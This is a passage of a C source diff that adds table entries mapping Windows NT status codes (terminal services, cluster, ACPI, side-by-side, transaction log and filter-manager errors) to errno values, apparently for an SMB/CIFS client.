++	{STATUS_CTX_CLIENT_QUERY_TIMEOUT, -EIO,
++	"STATUS_CTX_CLIENT_QUERY_TIMEOUT"},
++	{STATUS_CTX_CONSOLE_DISCONNECT, -EIO, "STATUS_CTX_CONSOLE_DISCONNECT"},
++	{STATUS_CTX_CONSOLE_CONNECT, -EIO, "STATUS_CTX_CONSOLE_CONNECT"},
++	{STATUS_CTX_SHADOW_DENIED, -EIO, "STATUS_CTX_SHADOW_DENIED"},
++	{STATUS_CTX_WINSTATION_ACCESS_DENIED, -EACCES,
++	"STATUS_CTX_WINSTATION_ACCESS_DENIED"},
++	{STATUS_CTX_INVALID_WD, -EIO, "STATUS_CTX_INVALID_WD"},
++	{STATUS_CTX_WD_NOT_FOUND, -EIO, "STATUS_CTX_WD_NOT_FOUND"},
++	{STATUS_CTX_SHADOW_INVALID, -EIO, "STATUS_CTX_SHADOW_INVALID"},
++	{STATUS_CTX_SHADOW_DISABLED, -EIO, "STATUS_CTX_SHADOW_DISABLED"},
++	{STATUS_RDP_PROTOCOL_ERROR, -EIO, "STATUS_RDP_PROTOCOL_ERROR"},
++	{STATUS_CTX_CLIENT_LICENSE_NOT_SET, -EIO,
++	"STATUS_CTX_CLIENT_LICENSE_NOT_SET"},
++	{STATUS_CTX_CLIENT_LICENSE_IN_USE, -EIO,
++	"STATUS_CTX_CLIENT_LICENSE_IN_USE"},
++	{STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE, -EIO,
++	"STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE"},
++	{STATUS_CTX_SHADOW_NOT_RUNNING, -EIO, "STATUS_CTX_SHADOW_NOT_RUNNING"},
++	{STATUS_CTX_LOGON_DISABLED, -EIO, "STATUS_CTX_LOGON_DISABLED"},
++	{STATUS_CTX_SECURITY_LAYER_ERROR, -EIO,
++	"STATUS_CTX_SECURITY_LAYER_ERROR"},
++	{STATUS_TS_INCOMPATIBLE_SESSIONS, -EIO,
++	"STATUS_TS_INCOMPATIBLE_SESSIONS"},
++	{STATUS_MUI_FILE_NOT_FOUND, -EIO, "STATUS_MUI_FILE_NOT_FOUND"},
++	{STATUS_MUI_INVALID_FILE, -EIO, "STATUS_MUI_INVALID_FILE"},
++	{STATUS_MUI_INVALID_RC_CONFIG, -EIO, "STATUS_MUI_INVALID_RC_CONFIG"},
++	{STATUS_MUI_INVALID_LOCALE_NAME, -EIO,
++	"STATUS_MUI_INVALID_LOCALE_NAME"},
++	{STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME, -EIO,
++	"STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME"},
++	{STATUS_MUI_FILE_NOT_LOADED, -EIO, "STATUS_MUI_FILE_NOT_LOADED"},
++	{STATUS_RESOURCE_ENUM_USER_STOP, -EIO,
++	"STATUS_RESOURCE_ENUM_USER_STOP"},
++	{STATUS_CLUSTER_INVALID_NODE, -EIO, "STATUS_CLUSTER_INVALID_NODE"},
++	{STATUS_CLUSTER_NODE_EXISTS, -EIO, "STATUS_CLUSTER_NODE_EXISTS"},
++	{STATUS_CLUSTER_JOIN_IN_PROGRESS, -EIO,
++	"STATUS_CLUSTER_JOIN_IN_PROGRESS"},
++	{STATUS_CLUSTER_NODE_NOT_FOUND, -EIO, "STATUS_CLUSTER_NODE_NOT_FOUND"},
++	{STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND, -EIO,
++	"STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND"},
++	{STATUS_CLUSTER_NETWORK_EXISTS, -EIO, "STATUS_CLUSTER_NETWORK_EXISTS"},
++	{STATUS_CLUSTER_NETWORK_NOT_FOUND, -EIO,
++	"STATUS_CLUSTER_NETWORK_NOT_FOUND"},
++	{STATUS_CLUSTER_NETINTERFACE_EXISTS, -EIO,
++	"STATUS_CLUSTER_NETINTERFACE_EXISTS"},
++	{STATUS_CLUSTER_NETINTERFACE_NOT_FOUND, -EIO,
++	"STATUS_CLUSTER_NETINTERFACE_NOT_FOUND"},
++	{STATUS_CLUSTER_INVALID_REQUEST, -EIO,
++	"STATUS_CLUSTER_INVALID_REQUEST"},
++	{STATUS_CLUSTER_INVALID_NETWORK_PROVIDER, -EIO,
++	"STATUS_CLUSTER_INVALID_NETWORK_PROVIDER"},
++	{STATUS_CLUSTER_NODE_DOWN, -EIO, "STATUS_CLUSTER_NODE_DOWN"},
++	{STATUS_CLUSTER_NODE_UNREACHABLE, -EIO,
++	"STATUS_CLUSTER_NODE_UNREACHABLE"},
++	{STATUS_CLUSTER_NODE_NOT_MEMBER, -EIO,
++	"STATUS_CLUSTER_NODE_NOT_MEMBER"},
++	{STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS, -EIO,
++	"STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS"},
++	{STATUS_CLUSTER_INVALID_NETWORK, -EIO,
++	"STATUS_CLUSTER_INVALID_NETWORK"},
++	{STATUS_CLUSTER_NO_NET_ADAPTERS, -EIO,
++	"STATUS_CLUSTER_NO_NET_ADAPTERS"},
++	{STATUS_CLUSTER_NODE_UP, -EIO, "STATUS_CLUSTER_NODE_UP"},
++	{STATUS_CLUSTER_NODE_PAUSED, -EIO, "STATUS_CLUSTER_NODE_PAUSED"},
++	{STATUS_CLUSTER_NODE_NOT_PAUSED, -EIO,
++	"STATUS_CLUSTER_NODE_NOT_PAUSED"},
++	{STATUS_CLUSTER_NO_SECURITY_CONTEXT, -EIO,
++	"STATUS_CLUSTER_NO_SECURITY_CONTEXT"},
++	{STATUS_CLUSTER_NETWORK_NOT_INTERNAL, -EIO,
++	"STATUS_CLUSTER_NETWORK_NOT_INTERNAL"},
++	{STATUS_CLUSTER_POISONED, -EIO, "STATUS_CLUSTER_POISONED"},
++	{STATUS_ACPI_INVALID_OPCODE, -EIO, "STATUS_ACPI_INVALID_OPCODE"},
++	{STATUS_ACPI_STACK_OVERFLOW, -EIO, "STATUS_ACPI_STACK_OVERFLOW"},
++	{STATUS_ACPI_ASSERT_FAILED, -EIO, "STATUS_ACPI_ASSERT_FAILED"},
++	{STATUS_ACPI_INVALID_INDEX, -EIO, "STATUS_ACPI_INVALID_INDEX"},
++	{STATUS_ACPI_INVALID_ARGUMENT, -EIO, "STATUS_ACPI_INVALID_ARGUMENT"},
++	{STATUS_ACPI_FATAL, -EIO, "STATUS_ACPI_FATAL"},
++	{STATUS_ACPI_INVALID_SUPERNAME, -EIO, "STATUS_ACPI_INVALID_SUPERNAME"},
++	{STATUS_ACPI_INVALID_ARGTYPE, -EIO, "STATUS_ACPI_INVALID_ARGTYPE"},
++	{STATUS_ACPI_INVALID_OBJTYPE, -EIO, "STATUS_ACPI_INVALID_OBJTYPE"},
++	{STATUS_ACPI_INVALID_TARGETTYPE, -EIO,
++	"STATUS_ACPI_INVALID_TARGETTYPE"},
++	{STATUS_ACPI_INCORRECT_ARGUMENT_COUNT, -EIO,
++	"STATUS_ACPI_INCORRECT_ARGUMENT_COUNT"},
++	{STATUS_ACPI_ADDRESS_NOT_MAPPED, -EIO,
++	"STATUS_ACPI_ADDRESS_NOT_MAPPED"},
++	{STATUS_ACPI_INVALID_EVENTTYPE, -EIO, "STATUS_ACPI_INVALID_EVENTTYPE"},
++	{STATUS_ACPI_HANDLER_COLLISION, -EIO, "STATUS_ACPI_HANDLER_COLLISION"},
++	{STATUS_ACPI_INVALID_DATA, -EIO, "STATUS_ACPI_INVALID_DATA"},
++	{STATUS_ACPI_INVALID_REGION, -EIO, "STATUS_ACPI_INVALID_REGION"},
++	{STATUS_ACPI_INVALID_ACCESS_SIZE, -EIO,
++	"STATUS_ACPI_INVALID_ACCESS_SIZE"},
++	{STATUS_ACPI_ACQUIRE_GLOBAL_LOCK, -EIO,
++	"STATUS_ACPI_ACQUIRE_GLOBAL_LOCK"},
++	{STATUS_ACPI_ALREADY_INITIALIZED, -EIO,
++	"STATUS_ACPI_ALREADY_INITIALIZED"},
++	{STATUS_ACPI_NOT_INITIALIZED, -EIO, "STATUS_ACPI_NOT_INITIALIZED"},
++	{STATUS_ACPI_INVALID_MUTEX_LEVEL, -EIO,
++	"STATUS_ACPI_INVALID_MUTEX_LEVEL"},
++	{STATUS_ACPI_MUTEX_NOT_OWNED, -EIO, "STATUS_ACPI_MUTEX_NOT_OWNED"},
++	{STATUS_ACPI_MUTEX_NOT_OWNER, -EIO, "STATUS_ACPI_MUTEX_NOT_OWNER"},
++	{STATUS_ACPI_RS_ACCESS, -EIO, "STATUS_ACPI_RS_ACCESS"},
++	{STATUS_ACPI_INVALID_TABLE, -EIO, "STATUS_ACPI_INVALID_TABLE"},
++	{STATUS_ACPI_REG_HANDLER_FAILED, -EIO,
++	"STATUS_ACPI_REG_HANDLER_FAILED"},
++	{STATUS_ACPI_POWER_REQUEST_FAILED, -EIO,
++	"STATUS_ACPI_POWER_REQUEST_FAILED"},
++	{STATUS_SXS_SECTION_NOT_FOUND, -EIO, "STATUS_SXS_SECTION_NOT_FOUND"},
++	{STATUS_SXS_CANT_GEN_ACTCTX, -EIO, "STATUS_SXS_CANT_GEN_ACTCTX"},
++	{STATUS_SXS_INVALID_ACTCTXDATA_FORMAT, -EIO,
++	"STATUS_SXS_INVALID_ACTCTXDATA_FORMAT"},
++	{STATUS_SXS_ASSEMBLY_NOT_FOUND, -EIO, "STATUS_SXS_ASSEMBLY_NOT_FOUND"},
++	{STATUS_SXS_MANIFEST_FORMAT_ERROR, -EIO,
++	"STATUS_SXS_MANIFEST_FORMAT_ERROR"},
++	{STATUS_SXS_MANIFEST_PARSE_ERROR, -EIO,
++	"STATUS_SXS_MANIFEST_PARSE_ERROR"},
++	{STATUS_SXS_ACTIVATION_CONTEXT_DISABLED, -EIO,
++	"STATUS_SXS_ACTIVATION_CONTEXT_DISABLED"},
++	{STATUS_SXS_KEY_NOT_FOUND, -EIO, "STATUS_SXS_KEY_NOT_FOUND"},
++	{STATUS_SXS_VERSION_CONFLICT, -EIO, "STATUS_SXS_VERSION_CONFLICT"},
++	{STATUS_SXS_WRONG_SECTION_TYPE, -EIO, "STATUS_SXS_WRONG_SECTION_TYPE"},
++	{STATUS_SXS_THREAD_QUERIES_DISABLED, -EIO,
++	"STATUS_SXS_THREAD_QUERIES_DISABLED"},
++	{STATUS_SXS_ASSEMBLY_MISSING, -EIO, "STATUS_SXS_ASSEMBLY_MISSING"},
++	{STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET, -EIO,
++	"STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET"},
++	{STATUS_SXS_EARLY_DEACTIVATION, -EIO, "STATUS_SXS_EARLY_DEACTIVATION"},
++	{STATUS_SXS_INVALID_DEACTIVATION, -EIO,
++	"STATUS_SXS_INVALID_DEACTIVATION"},
++	{STATUS_SXS_MULTIPLE_DEACTIVATION, -EIO,
++	"STATUS_SXS_MULTIPLE_DEACTIVATION"},
++	{STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY, -EIO,
++	"STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY"},
++	{STATUS_SXS_PROCESS_TERMINATION_REQUESTED, -EIO,
++	"STATUS_SXS_PROCESS_TERMINATION_REQUESTED"},
++	{STATUS_SXS_CORRUPT_ACTIVATION_STACK, -EIO,
++	"STATUS_SXS_CORRUPT_ACTIVATION_STACK"},
++	{STATUS_SXS_CORRUPTION, -EIO, "STATUS_SXS_CORRUPTION"},
++	{STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE, -EIO,
++	"STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE"},
++	{STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME, -EIO,
++	"STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME"},
++	{STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE, -EIO,
++	"STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE"},
++	{STATUS_SXS_IDENTITY_PARSE_ERROR, -EIO,
++	"STATUS_SXS_IDENTITY_PARSE_ERROR"},
++	{STATUS_SXS_COMPONENT_STORE_CORRUPT, -EIO,
++	"STATUS_SXS_COMPONENT_STORE_CORRUPT"},
++	{STATUS_SXS_FILE_HASH_MISMATCH, -EIO, "STATUS_SXS_FILE_HASH_MISMATCH"},
++	{STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT, -EIO,
++	"STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT"},
++	{STATUS_SXS_IDENTITIES_DIFFERENT, -EIO,
++	"STATUS_SXS_IDENTITIES_DIFFERENT"},
++	{STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT, -EIO,
++	"STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT"},
++	{STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY, -EIO,
++	"STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY"},
++	{STATUS_ADVANCED_INSTALLER_FAILED, -EIO,
++	"STATUS_ADVANCED_INSTALLER_FAILED"},
++	{STATUS_XML_ENCODING_MISMATCH, -EIO, "STATUS_XML_ENCODING_MISMATCH"},
++	{STATUS_SXS_MANIFEST_TOO_BIG, -EIO, "STATUS_SXS_MANIFEST_TOO_BIG"},
++	{STATUS_SXS_SETTING_NOT_REGISTERED, -EIO,
++	"STATUS_SXS_SETTING_NOT_REGISTERED"},
++	{STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE, -EIO,
++	"STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE"},
++	{STATUS_SMI_PRIMITIVE_INSTALLER_FAILED, -EIO,
++	"STATUS_SMI_PRIMITIVE_INSTALLER_FAILED"},
++	{STATUS_GENERIC_COMMAND_FAILED, -EIO, "STATUS_GENERIC_COMMAND_FAILED"},
++	{STATUS_SXS_FILE_HASH_MISSING, -EIO, "STATUS_SXS_FILE_HASH_MISSING"},
++	{STATUS_TRANSACTIONAL_CONFLICT, -EIO, "STATUS_TRANSACTIONAL_CONFLICT"},
++	{STATUS_INVALID_TRANSACTION, -EIO, "STATUS_INVALID_TRANSACTION"},
++	{STATUS_TRANSACTION_NOT_ACTIVE, -EIO, "STATUS_TRANSACTION_NOT_ACTIVE"},
++	{STATUS_TM_INITIALIZATION_FAILED, -EIO,
++	"STATUS_TM_INITIALIZATION_FAILED"},
++	{STATUS_RM_NOT_ACTIVE, -EIO, "STATUS_RM_NOT_ACTIVE"},
++	{STATUS_RM_METADATA_CORRUPT, -EIO, "STATUS_RM_METADATA_CORRUPT"},
++	{STATUS_TRANSACTION_NOT_JOINED, -EIO, "STATUS_TRANSACTION_NOT_JOINED"},
++	{STATUS_DIRECTORY_NOT_RM, -EIO, "STATUS_DIRECTORY_NOT_RM"},
++	{STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE, -EIO,
++	"STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE"},
++	{STATUS_LOG_RESIZE_INVALID_SIZE, -EIO,
++	"STATUS_LOG_RESIZE_INVALID_SIZE"},
++	{STATUS_REMOTE_FILE_VERSION_MISMATCH, -EIO,
++	"STATUS_REMOTE_FILE_VERSION_MISMATCH"},
++	{STATUS_CRM_PROTOCOL_ALREADY_EXISTS, -EIO,
++	"STATUS_CRM_PROTOCOL_ALREADY_EXISTS"},
++	{STATUS_TRANSACTION_PROPAGATION_FAILED, -EIO,
++	"STATUS_TRANSACTION_PROPAGATION_FAILED"},
++	{STATUS_CRM_PROTOCOL_NOT_FOUND, -EIO, "STATUS_CRM_PROTOCOL_NOT_FOUND"},
++	{STATUS_TRANSACTION_SUPERIOR_EXISTS, -EIO,
++	"STATUS_TRANSACTION_SUPERIOR_EXISTS"},
++	{STATUS_TRANSACTION_REQUEST_NOT_VALID, -EIO,
++	"STATUS_TRANSACTION_REQUEST_NOT_VALID"},
++	{STATUS_TRANSACTION_NOT_REQUESTED, -EIO,
++	"STATUS_TRANSACTION_NOT_REQUESTED"},
++	{STATUS_TRANSACTION_ALREADY_ABORTED, -EIO,
++	"STATUS_TRANSACTION_ALREADY_ABORTED"},
++	{STATUS_TRANSACTION_ALREADY_COMMITTED, -EIO,
++	"STATUS_TRANSACTION_ALREADY_COMMITTED"},
++	{STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER, -EIO,
++	"STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER"},
++	{STATUS_CURRENT_TRANSACTION_NOT_VALID, -EIO,
++	"STATUS_CURRENT_TRANSACTION_NOT_VALID"},
++	{STATUS_LOG_GROWTH_FAILED, -EIO, "STATUS_LOG_GROWTH_FAILED"},
++	{STATUS_OBJECT_NO_LONGER_EXISTS, -EIO,
++	"STATUS_OBJECT_NO_LONGER_EXISTS"},
++	{STATUS_STREAM_MINIVERSION_NOT_FOUND, -EIO,
++	"STATUS_STREAM_MINIVERSION_NOT_FOUND"},
++	{STATUS_STREAM_MINIVERSION_NOT_VALID, -EIO,
++	"STATUS_STREAM_MINIVERSION_NOT_VALID"},
++	{STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION, -EIO,
++	"STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION"},
++	{STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT, -EIO,
++	"STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT"},
++	{STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS, -EIO,
++	"STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS"},
++	{STATUS_HANDLE_NO_LONGER_VALID, -EIO, "STATUS_HANDLE_NO_LONGER_VALID"},
++	{STATUS_LOG_CORRUPTION_DETECTED, -EIO,
++	"STATUS_LOG_CORRUPTION_DETECTED"},
++	{STATUS_RM_DISCONNECTED, -EIO, "STATUS_RM_DISCONNECTED"},
++	{STATUS_ENLISTMENT_NOT_SUPERIOR, -EIO,
++	"STATUS_ENLISTMENT_NOT_SUPERIOR"},
++	{STATUS_FILE_IDENTITY_NOT_PERSISTENT, -EIO,
++	"STATUS_FILE_IDENTITY_NOT_PERSISTENT"},
++	{STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY, -EIO,
++	"STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY"},
++	{STATUS_CANT_CROSS_RM_BOUNDARY, -EIO, "STATUS_CANT_CROSS_RM_BOUNDARY"},
++	{STATUS_TXF_DIR_NOT_EMPTY, -EIO, "STATUS_TXF_DIR_NOT_EMPTY"},
++	{STATUS_INDOUBT_TRANSACTIONS_EXIST, -EIO,
++	"STATUS_INDOUBT_TRANSACTIONS_EXIST"},
++	{STATUS_TM_VOLATILE, -EIO, "STATUS_TM_VOLATILE"},
++	{STATUS_ROLLBACK_TIMER_EXPIRED, -EIO, "STATUS_ROLLBACK_TIMER_EXPIRED"},
++	{STATUS_TXF_ATTRIBUTE_CORRUPT, -EIO, "STATUS_TXF_ATTRIBUTE_CORRUPT"},
++	{STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION, -EIO,
++	"STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION"},
++	{STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED, -EIO,
++	"STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED"},
++	{STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE, -EIO,
++	"STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE"},
++	{STATUS_TRANSACTION_REQUIRED_PROMOTION, -EIO,
++	"STATUS_TRANSACTION_REQUIRED_PROMOTION"},
++	{STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION, -EIO,
++	"STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION"},
++	{STATUS_TRANSACTIONS_NOT_FROZEN, -EIO,
++	"STATUS_TRANSACTIONS_NOT_FROZEN"},
++	{STATUS_TRANSACTION_FREEZE_IN_PROGRESS, -EIO,
++	"STATUS_TRANSACTION_FREEZE_IN_PROGRESS"},
++	{STATUS_NOT_SNAPSHOT_VOLUME, -EIO, "STATUS_NOT_SNAPSHOT_VOLUME"},
++	{STATUS_NO_SAVEPOINT_WITH_OPEN_FILES, -EIO,
++	"STATUS_NO_SAVEPOINT_WITH_OPEN_FILES"},
++	{STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION, -EIO,
++	"STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION"},
++	{STATUS_TM_IDENTITY_MISMATCH, -EIO, "STATUS_TM_IDENTITY_MISMATCH"},
++	{STATUS_FLOATED_SECTION, -EIO, "STATUS_FLOATED_SECTION"},
++	{STATUS_CANNOT_ACCEPT_TRANSACTED_WORK, -EIO,
++	"STATUS_CANNOT_ACCEPT_TRANSACTED_WORK"},
++	{STATUS_CANNOT_ABORT_TRANSACTIONS, -EIO,
++	"STATUS_CANNOT_ABORT_TRANSACTIONS"},
++	{STATUS_TRANSACTION_NOT_FOUND, -EIO, "STATUS_TRANSACTION_NOT_FOUND"},
++	{STATUS_RESOURCEMANAGER_NOT_FOUND, -EIO,
++	"STATUS_RESOURCEMANAGER_NOT_FOUND"},
++	{STATUS_ENLISTMENT_NOT_FOUND, -EIO, "STATUS_ENLISTMENT_NOT_FOUND"},
++	{STATUS_TRANSACTIONMANAGER_NOT_FOUND, -EIO,
++	"STATUS_TRANSACTIONMANAGER_NOT_FOUND"},
++	{STATUS_TRANSACTIONMANAGER_NOT_ONLINE, -EIO,
++	"STATUS_TRANSACTIONMANAGER_NOT_ONLINE"},
++	{STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION, -EIO,
++	"STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION"},
++	{STATUS_TRANSACTION_NOT_ROOT, -EIO, "STATUS_TRANSACTION_NOT_ROOT"},
++	{STATUS_TRANSACTION_OBJECT_EXPIRED, -EIO,
++	"STATUS_TRANSACTION_OBJECT_EXPIRED"},
++	{STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION, -EIO,
++	"STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION"},
++	{STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED, -EIO,
++	"STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED"},
++	{STATUS_TRANSACTION_RECORD_TOO_LONG, -EIO,
++	"STATUS_TRANSACTION_RECORD_TOO_LONG"},
++	{STATUS_NO_LINK_TRACKING_IN_TRANSACTION, -EIO,
++	"STATUS_NO_LINK_TRACKING_IN_TRANSACTION"},
++	{STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION, -EOPNOTSUPP,
++	"STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION"},
++	{STATUS_TRANSACTION_INTEGRITY_VIOLATED, -EIO,
++	"STATUS_TRANSACTION_INTEGRITY_VIOLATED"},
++	{STATUS_LOG_SECTOR_INVALID, -EIO, "STATUS_LOG_SECTOR_INVALID"},
++	{STATUS_LOG_SECTOR_PARITY_INVALID, -EIO,
++	"STATUS_LOG_SECTOR_PARITY_INVALID"},
++	{STATUS_LOG_SECTOR_REMAPPED, -EIO, "STATUS_LOG_SECTOR_REMAPPED"},
++	{STATUS_LOG_BLOCK_INCOMPLETE, -EIO, "STATUS_LOG_BLOCK_INCOMPLETE"},
++	{STATUS_LOG_INVALID_RANGE, -EIO, "STATUS_LOG_INVALID_RANGE"},
++	{STATUS_LOG_BLOCKS_EXHAUSTED, -EIO, "STATUS_LOG_BLOCKS_EXHAUSTED"},
++	{STATUS_LOG_READ_CONTEXT_INVALID, -EIO,
++	"STATUS_LOG_READ_CONTEXT_INVALID"},
++	{STATUS_LOG_RESTART_INVALID, -EIO, "STATUS_LOG_RESTART_INVALID"},
++	{STATUS_LOG_BLOCK_VERSION, -EIO, "STATUS_LOG_BLOCK_VERSION"},
++	{STATUS_LOG_BLOCK_INVALID, -EIO, "STATUS_LOG_BLOCK_INVALID"},
++	{STATUS_LOG_READ_MODE_INVALID, -EIO, "STATUS_LOG_READ_MODE_INVALID"},
++	{STATUS_LOG_METADATA_CORRUPT, -EIO, "STATUS_LOG_METADATA_CORRUPT"},
++	{STATUS_LOG_METADATA_INVALID, -EIO, "STATUS_LOG_METADATA_INVALID"},
++	{STATUS_LOG_METADATA_INCONSISTENT, -EIO,
++	"STATUS_LOG_METADATA_INCONSISTENT"},
++	{STATUS_LOG_RESERVATION_INVALID, -EIO,
++	"STATUS_LOG_RESERVATION_INVALID"},
++	{STATUS_LOG_CANT_DELETE, -EIO, "STATUS_LOG_CANT_DELETE"},
++	{STATUS_LOG_CONTAINER_LIMIT_EXCEEDED, -EIO,
++	"STATUS_LOG_CONTAINER_LIMIT_EXCEEDED"},
++	{STATUS_LOG_START_OF_LOG, -EIO, "STATUS_LOG_START_OF_LOG"},
++	{STATUS_LOG_POLICY_ALREADY_INSTALLED, -EIO,
++	"STATUS_LOG_POLICY_ALREADY_INSTALLED"},
++	{STATUS_LOG_POLICY_NOT_INSTALLED, -EIO,
++	"STATUS_LOG_POLICY_NOT_INSTALLED"},
++	{STATUS_LOG_POLICY_INVALID, -EIO, "STATUS_LOG_POLICY_INVALID"},
++	{STATUS_LOG_POLICY_CONFLICT, -EIO, "STATUS_LOG_POLICY_CONFLICT"},
++	{STATUS_LOG_PINNED_ARCHIVE_TAIL, -EIO,
++	"STATUS_LOG_PINNED_ARCHIVE_TAIL"},
++	{STATUS_LOG_RECORD_NONEXISTENT, -EIO, "STATUS_LOG_RECORD_NONEXISTENT"},
++	{STATUS_LOG_RECORDS_RESERVED_INVALID, -EIO,
++	"STATUS_LOG_RECORDS_RESERVED_INVALID"},
++	{STATUS_LOG_SPACE_RESERVED_INVALID, -EIO,
++	"STATUS_LOG_SPACE_RESERVED_INVALID"},
++	{STATUS_LOG_TAIL_INVALID, -EIO, "STATUS_LOG_TAIL_INVALID"},
++	{STATUS_LOG_FULL, -EIO, "STATUS_LOG_FULL"},
++	{STATUS_LOG_MULTIPLEXED, -EIO, "STATUS_LOG_MULTIPLEXED"},
++	{STATUS_LOG_DEDICATED, -EIO, "STATUS_LOG_DEDICATED"},
++	{STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS, -EIO,
++	"STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS"},
++	{STATUS_LOG_ARCHIVE_IN_PROGRESS, -EIO,
++	"STATUS_LOG_ARCHIVE_IN_PROGRESS"},
++	{STATUS_LOG_EPHEMERAL, -EIO, "STATUS_LOG_EPHEMERAL"},
++	{STATUS_LOG_NOT_ENOUGH_CONTAINERS, -EIO,
++	"STATUS_LOG_NOT_ENOUGH_CONTAINERS"},
++	{STATUS_LOG_CLIENT_ALREADY_REGISTERED, -EIO,
++	"STATUS_LOG_CLIENT_ALREADY_REGISTERED"},
++	{STATUS_LOG_CLIENT_NOT_REGISTERED, -EIO,
++	"STATUS_LOG_CLIENT_NOT_REGISTERED"},
++	{STATUS_LOG_FULL_HANDLER_IN_PROGRESS, -EIO,
++	"STATUS_LOG_FULL_HANDLER_IN_PROGRESS"},
++	{STATUS_LOG_CONTAINER_READ_FAILED, -EIO,
++	"STATUS_LOG_CONTAINER_READ_FAILED"},
++	{STATUS_LOG_CONTAINER_WRITE_FAILED, -EIO,
++	"STATUS_LOG_CONTAINER_WRITE_FAILED"},
++	{STATUS_LOG_CONTAINER_OPEN_FAILED, -EIO,
++	"STATUS_LOG_CONTAINER_OPEN_FAILED"},
++	{STATUS_LOG_CONTAINER_STATE_INVALID, -EIO,
++	"STATUS_LOG_CONTAINER_STATE_INVALID"},
++	{STATUS_LOG_STATE_INVALID, -EIO, "STATUS_LOG_STATE_INVALID"},
++	{STATUS_LOG_PINNED, -EIO, "STATUS_LOG_PINNED"},
++	{STATUS_LOG_METADATA_FLUSH_FAILED, -EIO,
++	"STATUS_LOG_METADATA_FLUSH_FAILED"},
++	{STATUS_LOG_INCONSISTENT_SECURITY, -EIO,
++	"STATUS_LOG_INCONSISTENT_SECURITY"},
++	{STATUS_LOG_APPENDED_FLUSH_FAILED, -EIO,
++	"STATUS_LOG_APPENDED_FLUSH_FAILED"},
++	{STATUS_LOG_PINNED_RESERVATION, -EIO, "STATUS_LOG_PINNED_RESERVATION"},
++	{STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD, -EIO,
++	"STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD"},
++	{STATUS_FLT_NO_HANDLER_DEFINED, -EIO, "STATUS_FLT_NO_HANDLER_DEFINED"},
++	{STATUS_FLT_CONTEXT_ALREADY_DEFINED, -EIO,
++	"STATUS_FLT_CONTEXT_ALREADY_DEFINED"},
++	{STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST, -EIO,
++	"STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST"},
++	{STATUS_FLT_DISALLOW_FAST_IO, -EIO, "STATUS_FLT_DISALLOW_FAST_IO"},
++	{STATUS_FLT_INVALID_NAME_REQUEST, -EIO,
++	"STATUS_FLT_INVALID_NAME_REQUEST"},
++	{STATUS_FLT_NOT_SAFE_TO_POST_OPERATION, -EIO,
++	"STATUS_FLT_NOT_SAFE_TO_POST_OPERATION"},
++	{STATUS_FLT_NOT_INITIALIZED, -EIO, "STATUS_FLT_NOT_INITIALIZED"},
++	{STATUS_FLT_FILTER_NOT_READY, -EIO, "STATUS_FLT_FILTER_NOT_READY"},
++	{STATUS_FLT_POST_OPERATION_CLEANUP, -EIO,
++	"STATUS_FLT_POST_OPERATION_CLEANUP"},
++	{STATUS_FLT_INTERNAL_ERROR, -EIO, "STATUS_FLT_INTERNAL_ERROR"},
